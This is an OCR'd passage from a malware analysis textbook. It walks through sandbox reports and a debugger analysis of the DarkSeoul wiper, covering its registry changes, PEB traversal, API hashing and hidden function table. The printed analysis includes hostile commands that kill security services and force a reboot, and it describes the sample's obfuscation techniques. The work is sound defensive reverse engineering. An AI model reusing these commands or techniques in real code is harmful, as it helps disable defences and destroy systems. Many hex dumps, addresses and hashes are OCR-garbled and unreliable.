there is some network activity and set it up to 
capture packets and take screenshots, as well as 
record API calls and registry interactions. 
Additionally, all payloads and dropped files are 
saved in Sandboxie's drive. All the API calls of 
parent and child processes that run in Sandboxie 
will be recorded with parameters. Since 
Sandboxie is in user mode and does not allow 
kernel level interaction for security reasons, the 
details are limited to user mode information for 
this particular run. You can execute the malware 
inside Sandboxie's default box and wait for BSA 
to complete analysis. BSA integrates static 
analysis tools for executable analysis and 
fingerprinting including a basic disassembler, 
memory explorer, pcap explorer, FakeNet mode, 
android malware analyzer, internal malware 
threat analyzer, online URL analyzer, 
screenshots, registry monitoring, and a 


comprehensive list of online analyzers 
sample/hash submission. 


Overall, you get the impression that it is a very 
capable pocket-sized malware sandbox that does 
enough for someone looking to have a rapid 
overview without the installation overhead, 
especially if the user mode malware is your 
primary focus. In fact, a very quick malware lab 
can be constructed just using OllyDbg or IDA Pro 
and BSA with Sandboxie containing both 
OllyDbg/IDA Pro and the malware running inside 
Sandboxie, with API logging and Fakenet mode 
enabled, though you would prefer not to deploy 
it likewise for destructive malware samples and it 
could be better to use Cuckoo sandbox or your 
own virtual machine installation. 
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Report generated with Buster Sandbox 
Analyzer 1.88 
[ General information ] 

* File name: C:\Documents and 
Settings\Administrator\Desktop\DarkSeoul\ 
DarkSeoul_DB4BBDC36A78A8807AD9B15A562515C 
4.exe 


[ Changes to filesystem ] 
* No changes 


[ Changes to registry ] 

* Modifies value 
"NukeOnDelete=00000001" in key 
HKEY_LOCAL_MACHINE\software\microsoft\Win 
dows\CurrentVersion\Explorer\BitBucket 
old value empty 


* Creates value "DontShowUI=00000001" 
in key 
HKEY LOCAL _MACHINE\software\microsoft\Win 
dows\Windows Error Reporting 

* Creates Registry key 
HKEY LOCAL _MACHINE\software\microsoft\Win 
dows\Windows Error Reporting\LocalDumps 

* Creates value "(Default)=31" in key 
HKEY CURRENT _USER\software\SandboxAutoExe 
Cc 


[ Network services ] 
* No changes 


{[ Process/window/string information ] 

* Gets computer name. 

* Creates process "null, taskkill /F 
/IM pasvc.exe, null". 

* Injects code into process 
"C:\WINDOWS\system32\taskkill.exe". 

* Creates process "null, taskkill /F 
/IM clisvc.exe, null". 

* Creates process "null, shutdown -r - 
tO; nul. 

* Enables privilege SeDebugPrivilege. 

* Injects code into process 
"C:\WINDOWS\system32\shutdown.exe". 

* Enumerates running processes. 

* Enables privilege 
SeShutdownPrivilege. 

* Enables privilege 
SeRemoteShutdownPrivilege. 

* Enables process privileges. 

* Ends Windows session. 


A detailed system API call list, as shown in the 
following extract, is also generated, which is part 
of the individual reports in the BSA reports folder: 


CreateProcess(null, taskkill /F /IM 
clisvc.exe, null) [c:\documents and 
settings\administrator\desktop\darkseoul\ 
darkseoul_ db4bbdc36a78a8807ad9b15a562515c 
4.exe] 

GetModuleHandle(winlogon. EXE) 
[c:\documents and 
settings\administrator\desktop\darkseoul\ 
darkseoul db4bbdc36a78a8807ad9b15a562515c 
4.exe] 

OpenProcessToken(C:\Documents and 
Settings\Administrator\Desktop\DarkSeoul\ 


DarkSeoul DB4BBDC36A78A8807AD9B15A562515C 
4.exe, TOKEN DUPLICATE, TOKEN QUERY, 
TOKEN READ) [c:\documents and 
settings\administrator\desktop\darkseoul\ 
darkseoul db4bbdc36a78a8807ad9b15a562515c 
4.exe] 


ProcDot is a post-execution interactive visual 
analysis utility that can be implemented at this 
point as a separate analysis session (VMWare 
snapshot revert) so that you avail of a visual flow 
graph and timeline (much like malware forensic 
tools) of many of the key events in the execution 
trace of the malware such as Windows messages, 
new threads, new processes, registry access, 
filesystem access, and so on and so forth. For 
this, you have to have had installed Windump 
and WinPcap (or simply install Wireshark for the 
pcap file) a priori along with Procmon 
(Sysinternals Process Monitor) with the Procmon 
logs exported as .csv (not native .pml format) 
along with Graphviz as the dependencies 
required for this particular tool. 


A few simple config parameters need to be set, 
such as unckecking the Show Resolved 
Network Addresses (Ctr/+ WN) in Procmon 
options, and you need to manually input the full 
path of the dependencies. Thereafter, you 
execute the malware and hopefully capture the 
Procmon logs and pcap dumps as expected and 
then you feed the files to ProcDOT. ProcDOT 
makes a correlation between these two data 
sources and uses Graphviz to churn out the chart 
graphics. It can be a very handy tool given the 
right circumstances, and especially for the 
analysis report executive summary section, and 
you are encouraged to try it out. 
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You can use sandboxes such as Cuckoo and its 
online service malwr.com. The report offers a very 
detailed runtime trace as well as other static 
fingerprinting data, such as the one we have 
already extracted. But, the locations in the code 
are not too well demarcated as API calls drill 
down to their native equivalents. So, while the 
call parameters and payloads are monitored, you 
still have to get a one-to-one binary runtime 
address to feature translation, in order to get a 
very precise malware report and ascertain which 
function is responsible for doing what. A 
multitude of modules are dynamically loaded and 











we see that certain payloads are activated with 
certain parameters passed to certain function 
calls and in sequence. You will sift through this 
data and add the indicators of compromise to 
your final report. So, we have some evidence of 
malicious activity at this juncture. Now how do 
we pinpoint it? For that, we move on to manual 
analysis. 


Open the malware in OllyDbg using Ctr/+ Oor 
just drag and drop. You break in the module 
entrypoint of the main executable. In the CPU 
window, right-click and navigate to Search for | 
All Referenced text strings. You will see a very 
basic set of strings and not the ones you 
expected from your strings extraction activity 
earlier, and some of it is not detected by 
OllyDbg. This is because of the OllyDbg 
disassembly engine getting confused as to the 
regions of code and regions of data. You can 
reach their presumed code addresses and covert 
back to string data by selecting the region 
manually and choosing from the Analysis 
context menu to treat the data as ASCII text in 
the next analysis. Thereafter, you remove the 
analysis and reanalyze the code to get the similar 
depiction in the disassembly window as well. 
Experiment with the other options to see what 
you get. 


(ilyOby = DarkSeou ODYBHDC36A7OAQOO ADO SAS62S1SCeve= {CPU main thread male Dark Secu) 
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Try to find the dump of strings, as shown in the 
following text dump, from the strings list (double- 
click on any line), click on the memory dump 
view below the CPU disassembly view, and use 
the mouse to scroll up or down. You can also 
press Ctri/+ Gand type a hexadecimal address 
and transport there right away. 


[Text Dump] 

00402987 00 00 00 00 00 00 00 00 00 00 
AR AR 38) 34.30) 3 Vaan aes J08401 
00402997 31 32 2D 43 52 41 53 38 34 36 
38 2D 31 31 31 35 12-CRAS8468-1115 
004029A7 30 39 32 33 2D 50 43 49 38 32 


37 33 56) 00) 50) 52. 8923-PCE8273V.PR 
004029B7 49 4E 43 50 45 53 00 48 41 53 
54 41 54 49 2E 0Q@ INCPES.HASTATI.. 
004029C7 5C 54 65 6D 70 5C 7E 76 33 2E 
6C 6F 67 00 42 3A \Temp\~v3.1log.B: 
004029D7 5C 00 5C 00 2E 2E 00 25 73 2A 
2E 78 ORNS 0 72°50 NaN en eS oa REO 
004029E7 67 72 61 6D 20 46 69 6C 65 73 
00 50 72 6F 67 72 gram Files.Progr 
004029F7 61 6D 44 61 74 61 00 25 73 25 
73 00 25 63 3A 5C amData.%s%s.%c:\ 
00402A07 00 5C 5C 2E 5C 25 63 3A 00 5C 
SEIZE 56 5068. 79) cove Wee Aran Va WEY 
00402A17 73 69 63 61 6C 44 72 69 76 65 
25 64 00 25 73 00 sicalDrive%sd.%s. 
00402A27 73 68 75 74 64 6F 77 6E 20 2D 
72 20 2D 74 20 30 shutdown -r -t 0 
00402A37 00 53 65 53 68 75 74 64 6F 77 
6E 50 72 69 76 69 .SeShutdownPrivi 
00402A47_ 6C 65 67 65 00 74 61 73 6B 6B 
69 6C 6C 20 2F 46 lege.taskkill /F 
00402A57 20 2F 49 4D 20 70 61 73 76 63 
2E 65 78 65 00 74 #/IM pasvc.exe.t 
00402A67 61 73 6B 6B 69 6C 6C 20 2F 46 
20 2F 49 4D 20 63 askkill /F /IM c 
00402A77 + 6C 69 73 76 63 2E 65 78 65 00 
8B 3B 23 4D F8 23 lisvc.exe..;#M.# 
00402A87_ FE OB CF 75 05 83 C3 14 EB E6 
SB De 75) 590 SB SD een cranes pata 


You can immediately see some strings that 
reference service image names and the taskkill 
command in Windows. We also see a shutdown- 
related string that might hint at the behavior of 
this malware. We also see Strings referring to the 
physical drive, as well as temp files and what 
looks ostensibly like a privilege escalation 
parameter to a Win32 API function— 
SeShutdownPrivilege(). Speaking of privileges, 
the SeDebugPrivilege is required in Windows to 
perform process hollowing or process injection. 
This particular privilege allows a process to open 
other processes and read/write their memory. 
When you see this privilege passed/set with the 
API AdjustTokenPrivileges, it should be a red 
flag for suspicious activity. We also see some 


format strings that are very likely to be used in 
string-related functions to build dynamically 
changing strings to enumerate various 
parameters or loop values. You can read more 
about the concept at 
http://blogs.msdn.com/b/oldnewthing/archive/20 
08/03/14/8080140.aspx and the privilege 
constants at https://msdn.microsoft.com/en- 
us/library/windows/desktop/bb530716(v=vs.85). 
aspx. 


Open up the memory window and study the 
memory layout of the executable. Press Ctr/+ E 
to open the executable names window to see the 
list of loaded executables. You will notice how this 
will look different when more dlls are loaded as 
we move on. Press Ctr/+ Mto understand the 
memory layout of the process space. 


A simple thing to do at this point is to set the 
debugger event options as in the following 
exhibit: 


Commands | Disasm | CPU | Registers | Stack | Analysis | Analysis 2 | Analysis 3 | 
Security | Debug Events | Exceptions Trace | SFX | Strings | Addresses | 


Make first pause at: 
( System breakpoint 
C Entry point of main module 
(© \WinMain [if location is known] 


IV Break on new module (DLL) 

IV Break on module (DLL) unloading 
\¥ Break on new thread 

IV Break on thread end 

IV Break on debug sting 





Undo | Cancel | 


This will ensure that the debugger will break on 
the events listed previously, for example when a 
new module is loaded or unloaded, or if a new 
thread is created. If you detect TLS callbacks (a 
mechanism for threads to have their own storage 
space, which can be invoked or called if callbacks 
are registered, even before the main function 
executes), then you can set the system to the 
breakpoint option. This is normally detected in 
the data directories data structure in the PE file 
headers and if there is mention of it by the static 
analysis tools, then it is absent. 


You should also have an overview of the 
disassembly to look for regions of interest. Open 
up the sample in IDA Pro and check the chart 
references and the WinGraph32 chart. You will see 
that the charts are a dead-end. The references 
lead nowhere (not without some work on your 
part) and the imports are not being utilized for 


anything overtly malicious. Large sections of 
unrelated code are visible and many regions or 
green-colored (default) data boundaries exist, 
which could be encrypted data or code 
recognized as data. 


Demarcate the function boundaries and what IDA 
Pro's FLIRT technology already recognizes. Set 
down to isolate these undetected regions in 
OllyDbg as an overview. Mix and match tools and 
repeat techniques. There is no silver bullet when 
it comes to malware analysis, and your "favorite 
gun" might be the very weapon that gets 
jammed in the heat of the battle. The less 
dependent you are, the more resourceful you will 
be. You want the results to be consistent all 
across. 
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Non-resolving cross-references in the following 
exhibit from IDA Pro (View | Graphs | Xrefs 
from). 





sub_463668 proc near 


; FUNCTION CHUNK AT 6604635C6 SIZE 66066669 BYTE 


jb 






A woring 


A Couldn't find any xrefs! 


loc_4636C4: 
mov eax, [esitecx*4+4] 
mov [editecx*4+4], eax 
lea eax, ds: 6[ecx*4] 










Back to OllyDbg, go over the executable code to 
get an overview of the length and the kinds of 
code regions you will be analyzing. Try to get an 
overall feel of the disassembly—is it overtly 
complex with lots of XOR, SHL, SUB and MUL, 
nested loops, and with lots of dynamic register- 
based function calls and lots of indirect 
addressing or switch tables and virtual functions? 
Or, is it a more direct fare with expected 
disassembly? Try to visually pattern match the 
disassembly code you have seen from your 
experience and try to build a catalog of such 
patterns that will aid you in speedier analysis. 
Demarcate high entropy regions and suspicious 
looking code (IDA Pro View-A and the Hex View A 
really help with the color schemes, try it), and 
comment your way inside the debugger furiously 
(use the ; (semicolon) in both OllyDbg and IDA 


Pro) or use an external text editor prior to 
compiling notes and screen snapshots for your 
report. 


Thereafter, start executing the sample inside the 
debugger and try to selectively engage and test 
all the concepts you have been imbibing till now. 
Use a combination of educated single stepping 
(F7) and stepping over (F8&), as well as setting 
breakpoints (F2), conditional breakpoints (Shift + 
F2), and conditional expressions (Shift+ F4) as 
you go along. Understand the different types of 
breakpoints at your disposal 
(hardware/software/memory/conditional) and use 
F9 or Debug | Run when you feel you will hit a 
breakpoint you set or you can F4 hit-and-run 
your way as you select addresses with your 
mouse LMB and break at that position (careful, if 
the instruction is not in the execution path, it will 
never hit and the malware will execute), skipping 
long and repetitive code section this way. You can 
always return to user-code by pressing A/t+ F9 
or execute till the return prologue of the called 
function calls by pressing Ctr/+ F9. Keep an eye 
on the function call boundaries (prologue and 
epilogue of even seemingly unreachable ones), 
and loop conditionals and the addresses they 
branch to when true or false. Watch out for 
function call parameters on the call stack and the 
register values used to store, calculate, or 
compare data types. Check the handles used by 
the debugee to identify system resources in use. 
Check the Windows pane to check the window 
classes and callbacks that are registered 
especially with GUl-based executables. The call 
trace window gives a breadcrumb trail of the 
prior function calls when a breakpoint is reached 
and this can help you in backtracing where the 
originating call actually took place. 


Make use of OS API function call breakpoints. 
Win32 APIs such as VirtualALLocExA() and 
VirtualProtect() for memory allocation as well 
as LoadLibraryExA() (and variants such as 
LoadLibraryExwW, LoadLibraryExA, and so on), 
GetModuleHandle(), and GetProcAddress() for 
system API function invocation are sequences 
that always occur in tandem. For VB5/6 
applications, the MSVBM60.dL1 function call is the 
same as LoadLibrary/GetProcAddress. 


Each function is like a musical note and the 
series of notes play a particular melody of music. 
Thus, API profiling is a very strong pattern-based 
identification technique. If you can locate 
expected sequence of API calls, you can quickly 
isolate that region as doing something specific 
like loading checksums of system API function 
names, for example, from the _EPROCESS kernel 
mode process data structure. Certain API calls are 
used for registry access and privilege escalation; 
make note of any single calls such as this and 
always read it in the context of which parameters 
are passed to the function and what is it trying to 
achieve. Another tip is to keep MSDN at hand via 
installation disk or the Internet (preferably in 
another VM guest or the host machine only) so 
that any and all API calls that need to be verified 
and referenced for the constant values, return 
values, parameters, and function purpose can be 
done so. It is a great learning tool even for any 
analysis session. There are also a host of other 
published books that provide resources such as 
undocumented APIs for the NT kernel, the NTFS 
filesystem, driver development (WDK/DDK), and 
Windows internals with new ones releasing every 
now and then. Look for changes in the memory 
dump areas as the colors change (toggle for both 
ASCII and UNICODE as they can be lost in one 


representation to the other in the hex to text 
dump), check the memory window in OllyDbg to 
see new allocated regions and their contents 
while using Ctr/+ Bto search for hex strings, 
and so on and so forth. 


Moving on, at first glance and preliminary 
investigation, the malware has no armoring and 
just one imported dll. No high entropy regions or 
encrypted strings either. You could doa 
preliminary check that if you set breakpoints on 
string addresses from the strings window in 
OllyDbg or the API breakpoints in the obtained 
names list in OllyDbg, you will not break on any 
of them and the executable just runs and 
bypasses all such measures. So, if there is 
malicious code, what is it referring it to? What is 
the obfuscation method being employed? To 
have some fun, you could set breakpoints at 
many of the unreachable code regions that look 
like functions and hope that the breakpoints are 
hit, after which you can backtrace using the call 
stack and do that repeatedly till you get one of 
the originating calls, that would be in a register 
value, from which you can construct a flowchart 
of all such breakpoint hits. Experimentation is all 
good; however, we will do no such thing and we 
will employ a rather elegant way of resolving this 
predicament. We will capture the function pointer 
tables in its entirety so that right at the outset 
we have the whole map as to where the 
branching locations are and we can then set 
breakpoints based on the information and start 
naming the functions as per their payloads and 
features. Moving on, very shortly you will reach 
the following code. 


Obfuscation - a dynamic in- 
memory function pointers table 


Here, we see a function address table being built 
that is referenced for the payloads and dll 
searching later on. 


CilyDbg Dark Seoul ODYBODC3OATOANOO7ADYO15SA8G251SC4.eve = (CPU - main thread module DarkSequ} 
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Many of these addresses are not referenced by 
any code, and this table is used to access 
unreachable regions. You will remember that 
addresses in groups of dwords or words are read 
as little-endian; hence, from the following exhibit 
at 0x004026F5, the value is 0x40129E and so 
on for the rest and also for other data structures 
like import and export tables: 


[Text Dump] 

004026E5 00 00 00 
40 00 BC 11 40 00 
004026F5 9E 12 40 
40 00 D4 14 40 00 
00402705 5C 15 40 
40 00 5A 19 40 00 
00402715 43 1A 40 
40 00 72 1D 40 00 
00402725 OA 1E 40 
40 00 11 1F 40 00 
00402735 B4 1F 40 
40 00 EB 20 40 00 
00402745 1F 21 40 
40 00 FA 23 40 00 
00402755 AD 01 00 
00 00 48 00 00 00 


0040103F |> 8B45 
SS: [EBP-4] 
00401042 |. 40 
00401043 |. 8945 
[EBP-4] , EAX 
00401046 | > 837D 
[EBP-4],1B 
0040104A |. 73 27 
DarkSeou.00401073 
0040104C |. 8B45 
SS: [EBP-8] 
0040104F |. 8B4D 
SS: [EBP-24] 
00401052 |. 8908 
[EAX] , ECX 
00401054 |. 8B45 
SS: [EBP-8] 
00401057 |. 83C0 
0040105A |. 8945 
[EBP-8] , EAX 
0040105D |. 8B45 
SS o/EBP= 14] 
00401060 |. 8B4D 
SS") (EBP 24) 
00401063 |. 0308 
DS: [EAX] 

00401065 |. 894D 
[EBP-24] ,ECX 
00401068 |. 8B45 


SS: [EBP-14] 


10 40 
@...@. 
12 40 
Hope 
15 40 
.@.. 
1A 40 
.@...@. 
1E 40 
.@...@. 
1F 40 
a eee eee oie 
00 B2 21 40 
.1@..!1@..#@. 
00 OF 00 00 


Ga 
00 B9 
ae a 
00 4A 
nad) 
00 FF 
@ 


FC /MOV EAX,DWORD 
| INC EAX 

FC | MOV DWORD PTR 

FC > CMP DWORD PTR 
| JNB SHORT 

F8 | MOV EAX,DWORD 

DC | MOV ECX,DWORD 
| MOV DWORD PTR 

F8 | MOV EAX,DWORD 

04 | ADD EAX,4 

F8 | MOV DWORD PTR 

EC | MOV EAX,DWORD 

DC | MOV ECX,DWORD 
| ADD ECX,DWORD 

DC | MOV DWORD PTR 

EC | MOV EAX,DWORD 


00 AD 
yaa 
00 2D 
reall 
00 FE 


.@.Z.@. 


00 93 
r.@. 

00 BC 
..@. 
00 96 
- 
60 BD 
.#@. 

00 E2 


11 


13 


15 


1B 


TE 


20 


23 


00 


Note the following function that builds the 
preceding table: 


PTR 


SSi 


SS: 


PTR 


PTR 


DS: 


PTR 


$5: 


PTR 


PTR 


PTR 


$5: 


PTR 


0040106B |. 83C0 04 | ADD EAX,4 
0040106E |. 8945 EC |MOV DWORD PTR SS: 
[EBP-14] , EAX 

00401071 | .*EB CC \JMP SHORT 
DarkSeou.0040103F 

00401073 |> 8B45 F4 MOV EAX,DWORD PTR 
SS: [EBP-C] ; 
DarkSeou.00402499 


You will see in subsequent analysis that registers 
are loaded with the base address at stack 
segment [EBP-C]: 


0x402499 


This in future code sequences is taken as the 
base of the function table in various registers 
such as ESI and an offset into the table, which is 
added as a Static offset to this particular value for 
instance: 


CALL DWORD PTR DS: [ESI+3B8] 


All the payload-related functions are loaded in 
this way; so keep an eye open for indirect 
addressed calls like this—this is an obfuscation 
method as none of the code regions are directly 
referenced in code. 


The PEB traversal code 


Here, we see a well-known technique for 
traversing PEB data structure to search for 
system dlls and checking for hardcoded 
checksums as in the following code sequence: 


From MSDN, visit 
http://msdn.microsoft.com/enus/library/windows/ 
desktop/aa813706%28v=vs.85%29.aspx. 


The PEB data structure is organized as in the 
following exhibit, and we are interested in the 
PPEB_LDR_DATA structure, which contains 
information about loaded modules in the process: 


PRTL_USER PROCESS PARAMETERS 


BYTE 
PVOID 
PPS POST PROCESS INIT ROUTINE 
BYTE 
PVOID 
Mee 

} PEB, *PPEB; 





004023BD eee hs) PUSH EST 

;start of PEB TRAVERSAL FUNCTION 
004023BE SRS CLD 

004023BF . 33D2 XOR EDX,EDX ; 
EDX == 

004023C1 . 64:8B5>MOV EDX,DWORD PTR FS: 
[EDX+30] ; PEB 

004023C5 . 8B52 0>MOV EDX,DWORD PTR DS: 
[EDX+C] ;pointer to PEB_ LDR DATA 
004023C8 . 8B52 1>MOV EDX,DWORD PTR DS: 


[EDX+14] ; InMemoryOrderModuleList 
004023CB > 8B72 2>MOV ESI,DWORD PTR DS: 
[EDX+28];Malware ImagePath (Unicode) 


004023CE . 33C0 XOR EAX,EAX 
004023D0 . B8 180>MOV EAX,18 
004023D5 ou PUSH EAX 
004023D6 cee hs) POP ECX 

004023D7 « SSFF  XOR EDEL, EDI 
004023D9 > 33C0 XOR EAX,EAX 
004023DB » AC EQDS BYTE, PTR. DS: 
[ESE] 

004023DC 2 30.61 CMPAL 64 


004023DE e021 SHORT 


DarkSeou.004023E2 


004023E0 ~ 2@ 20" SUB AL 20 
004023E2 > C1CF 0>ROR EDI,0D 
004023E5 . 03F8 ADD EDI,EAX 


004023E7 « E2 FO LOOPD SHORT 
DarkSeou.004023D9 


004023E9 . 81FF 5>CMP EDI, 6A4ABC5B 


skernel32.dll 7C800000 is loaded and the 
checksum is calculated from the name 


004023EF . 8B5A 1>MOV EBX,DWORD PTR DS: 
[EDX+10] 

004023F2 . 8B12 MOV EDX,DWORD PTR DS: 
[EDX] 


004023F4 ao, DS JNZ SHORT 
DarkSeou.004023CB 


004023F6 . 8BC3 MOV EAX,EBX 
004023F8 nee POP ESI 
004023F9 2 C3 RETN 


Looking at the following exhibit, we see that the 
instruction at 0x402434 from the call at 
0x4023FA is used to dynamically compare the 
function hash values loaded in EDI and SS: 
[ESP+1C]. Setting a conditional breakpoint (Sh/ft 
+ F2) in OllyDBG at 0x402434 using condition 
EDI == [ESP+1C] to break at every hash value 
that is successfully computed. Logging of the 
conditional expression can be done in the 
Condition Expression dialog box to always; 
however, in OllyDbg 1.10, this seems to not work 
as expected and thus you can set it to Never and 
press F9 (run) to capture the breakpoint hit at 
every press without stepping in the code. Thus, 
you can compile a list of function hashes for 
every function name string constructed in the 
binary. 


The hash calculation and checking function is as 
follows: 


0040241B > ES 7/0 JECXZ SHORT 
DarkSeou.0040248D 


0040241D . 49 DEC ECX 
0040241E . 8B348B MOV ESI,DWORD 
PTR DS: [EBX+ECX*4] 

00402421 2 03F5 ADD ESI,EBP 
00402423 2 33FE XOR EDI,EDI 
00402425 a ah CLD 

00402426 = 3300 XOR EAX,EAX 
00402428 . AC LODS BYTE PTR 
DS (ESL) 

00402429 . 3AC4 CMP AL,AH 
0040242B 2 74 OF JE SHORT 
DarkSeou.00402434 

0040242D 2 CICK OD ROR EDI,0D 
00402430 « OSES ADD EDI,EAX 
00402432 2 EB. F2 JMP SHORT 


DarkSeou.00402426 
00402434 >> 3B7C24 1C CMP EDI,DWORD 
PTR SS: [ESP+1C] 


You will get the following list if you capture the 
function text and hash (base is hexadecimal) at 
each breakpoint hit: 


ECOE4E8E 
7CODFCAA 
591EA70F 
97E8C2A2 
24488A0F 
8ED44C9E 
56C61229 
F8ECDBED 
A12B930B 


LoadLibraryExA 
GetProcessAffinityMask 
OpenSCManagerA 
LookupPrivilegeValueW 
AllocateAndInitializeSid 
OpenFileMappingW 
CreateFileMappingW 
GetWindowsDirectory 


InitializeCriticalSectionAndSpinCount 


CA2BD06B 
CEO5D9AD 
016D1E21 
C75FC483 
DB2D49B0 
E9D18E21 
A39C10BA 
63D6C065 
83D32647 
A5E1AC97 
23545978 
7C0017A5 
E80A791F 
OFFD97FB 
C2FFB025 
76DAO8AC 
B8E579C1 
3BF42C83 


CreateTimerQueue 
WaitForSingleObjectEx 
LoadLibraryA 
GetVersionExW 

SleepEx 

GetDriveTypeW 
EnumCalenderInfoA 
FindFirstFileExA 
RemoveDirectoryW 
FindNextFilew 
FindCloseChangeNotification 
CreateFileMappingA 
WriteFileEx 
CloseProfileUserMapping 
DeleteFilew 
SetFilePointerEx 
GetSystemDirectoryW 
GetDiskFreeSpaceExA 


00CB2210 GetDiskFreeSpaceExwW 
10FA6516 ReadFileEx 

OE8AFE98 WriteConsoleA 
7B8F17E6 GetCurrentProcessId 
75DA1966 GetLinguistLangSize 
670F596E strchr 

5D2E6D6B mktime 

67875973 strcspn 

5D866970 memmove 

672F5BA8 strncat 

De733ClE, sqrt 

676F596A_ strcoll 

5B7E2B9A_ mblen 

CF281CE5 freopen 

08074970 PathFileExistswW 
89DABEF5 FillRect 


We see that a lot of API names are referenced for 
their loading address from their dlls that can be 
used maliciously. 


At this point, we can see that the following dlls 
are loaded during execution: 


CiyDbg Dark Seoul ODABODC3GATOANOO7ADO1SASH2S1SC4.ene = [Executable modules} “lily 
Fe en Oy Pps ys Wn He Bier Bus 
= WS — | a 


eat Tile rh Path ; 








Day HAD AeA 


startin, | 2 rash, itd jena, | ant, | ots. 04, | 2) AM 


The first function import value of 
LoadLibraryA(), 0x7C801D77, is looked up and 
stored in the following table—it is an in-memory 
import table built by the malware: 





CilyDbg  DarkSeoul_OO4BODC3GA7OANOO7AD4O1SASG2S15C4.eve= [CPU main thread module Dak Sou 





tn 
hae tg 


z 
thy te (2a tr | sows |) cnt, | ah n, asm 


We see a sequence of API functions such as 
GetProcessAffinityMask() and 
OpenSCManagerA() as the next function names in 
the hashed list and so on serially. 








Finally, when the imports address list is built-in 
memory, we can see it at: 


Gilby «Dark Seoul OUBNDCIGA7OAGOOTADSOLSASG251SC‘,eve = {CPU main thread module DarkSeouy} 





tote. str | [soo | Hmm. aC, 


Other dlls and function names are invoked after 
LoadLibraryExA() and GetProcAddress() are 
repeatedly called over the hash list function 
names. Once loaded, the exports of each dll are 
parsed using the PE header offsets (MZ | 
e_Ifanew | PE header | optional header | data 
directory | exports). 


Import the address table built after function call: 


[Text Dump] 


004027C0 00 53°77 DD 77 1B DI DF 77 34 
C5 DE 77 FE BO 90) SWiWo. cW4 Wis 





004027D0 7C 6C 94 80 7C 3B 29 82 7C Al 
OFS FCe2F 308 oil Ua clic eine 
QO4027E0) 7C 30 25.80 FC ED 10; 90) 7c 51 
28 81 7C 42 24 80 | 0%.| ...| Q(.| BS. 
004027FO0 7C FB 2C 82 7C 05 10 90 7C 59 
S58 FC, Od BO 35a) )[(e eel enclose 
00402800 7C 19 90 83 7C DO EVE 80 7C 24 
TACSO) Fey OR ORs Ba) || are s| ee |Saall ees 
OO402010" 7C 77 EB Se FE SC EEL el 7e A 
OD 31 FC 163CO Bl) wel eee ell call 
O0402920° 7C 73 7382 FC 21°74 82 7c BE 
13-80 -7€ 4D 11-86 |'ss3| tre... Me 
00402830 7C OD BO 80 7C 31 03 91 7C 77 
1D 30 FE 285hC 80. || Falta. alles 
00402840 7C 40 60 C4 77 FO 75 C4 77 30 
60 C4 77 70 6F C4 | @ .w.u.wO .wpo. 
00402850 77 AO 78 C4 77 31 F9 C3 77 30 
V1 L4 TF OF C4 C2 woxwl. wOwow... 
OO402060" 77 1B C2 (G2 77. 57 GF FA 77 6p 
9E D8 77 OF A7 1E_ w...wWo.wm..w... 
00402870 59 A2 C2 E8 97 OF 8A 48 24 9E 
AC D4 SE 29° 42°C6. Vesna c. Lae eed Lier les 
00402880 56 ED DB EC F8 6B 93 2B Al 6B 
DO: 2B CA AD IDG 05: Visa. t.k.t.... 
00402890 CE 21 1E 6D 01 83 C4 5F C7 BO 
49 2D5 DB, 2a GE MDd Ae Mian een = cle 
004028A0 E9 BA 10 9C A3 65 CO D6 63 47 
26 D383 97 ACEI oe. ee @.2OGWe ccc: 
004028B0 A5 78 59 54 23 A5 17 00 7C 1F 
79°60 (ES FROG? FDL xe! oveeuen 
004028CO OF 25 BO FF C2 AC 08 DA 76 Cl 
79 E568 :83) 20 A (en En eared 
004028D0 3B 10 22 CB 00 16 65 FA 10 98 
FE 8A, QE EG 17% SF Batre c@n.a. cena 
004028E0 7B 66 19 DA 75 8E 4E OE EC AA 
FG: OD) 76) 6E59.0P 2h. suc. [nY 
004028F0 67 6B 6D 2E 5D 73 59 87 67 70 
69 86 5D A8 5B 2F gkm.]sY.gpi.].[/ 
00402900 67 1E 3C 73 D7 6A 59 6F 67 9A 
2B JE SB ES 10 28° igias.j¥oger= tas ¢ 
00402910 CF 70 49 07 08 F5 BE DA 89 03 
00 80 O06 G4 7G" pleic.c ates. adv 
00402920 61 70 69 33 32 2E 64 6C 6C 00 
00 60 00 00 00 00 “apis2.dlle... au 
00402930 00 1D 00 00 00 6B 65 72 GE 65 


GC 133) °32 2E ©4500 sean kernel32.dl 
00402940 6C 00 00 00 00 00 00 00 00 09 
OO CO OO GD 7s iG meal mcm ave man msv 


00402950 63 72 74 2E 64 6C 6C 00 00 00 
OOCCU SOO OOOO OON ae nt ll erm crn: 
00402960 00 01 00 00 00 73 68 6C 77 61 
TOP GOVE, O4%0C (OC) ees shlwapi.dll 
00402970 00 00 00 00 00 00 00 00 00 O1 
OO FOUSUO ioe 2305. meer use 


00402980 72 33 32 2E 64 6C 6C 00 00 00 
00 00 00 00 [ee Pas IM Uriah 


4 > 


After the loading sequence of all dlls, you can list 
out all intermodular calls in the main executable, 
which turns out to be deceiving (with only 
kernel32.dll being referenced inside OllyDbg) 
as most of the payload function calls are made 
using the internal table identified before: 


CiyDbg Dark Seoul DDABBDCSOATOANOOTAD4O1SAS6251SC4.ene = [Found intermodal lay 
Fe Ve Dey Pts Cys Wn Bu 
owt MN od AE A ho il 
idiess [Disagenly Destination ; 








Dat HEAPS OORT TTC 


sp oa a eon fae ene 


Next, we follow up with some artifacts of this 
malware as it begins to build and execute its 
main payloads. 





Section object creation 


; call to 0x4011AD 

004011A4 |. FF9>CALL DWORD PTR DS: 
[EAX+254] 

swhich calls 


004011B1 50 PUSH EAX 


004011B2 . FF9>CALL DWORD PTR DS: 
[EAX+258] 
004011B8 2 oo POPS ECX 


;Through call at 0x4011BC; task for the 
reader, what do you think it does? 


This follows through: 


004011D5 |. 6A >PUSH 4 

004011D7 |. FF9>CALL DWORD PTR DS: 
[ESI+334] ;kernel32.OpenFileMappingA 
004011DD |. 85C>TEST EAX,EAX 

004011DF |. OF8>JNZ DarkSeou.00401299 
QO4071E5 |. 5% PUSH EDI 


This calls OpenFileMappingA with parameters: 


0012FE50 004011DD /CALL to 
OpenFileMappingA from DarkSeou.004011D7 
0012FE54 00000004 | Access = 
FILE MAP READ 

0012FE58 00000000 | InheritHandle = 
FALSE 

OOTZEESC 00402991 \MappingName = 
"J0840112-CRAS8468 - 11150923 -PCI8273V" 


We have already seen the string hardcoded in 
the binary. 


Next: 


O04011EC |. 6A >PUSH -1 
004011EE |. FF9>CALL DWORD PTR DS: 


[ESI+338] ; 
kernel32.CreateFileMappingA 
004011F4 | . 68 >PUSH 103 


With parameters: 


Q0012FE44 004011F4 /CALL to 
CreateFileMappingA from DarkSeou.004011EE 
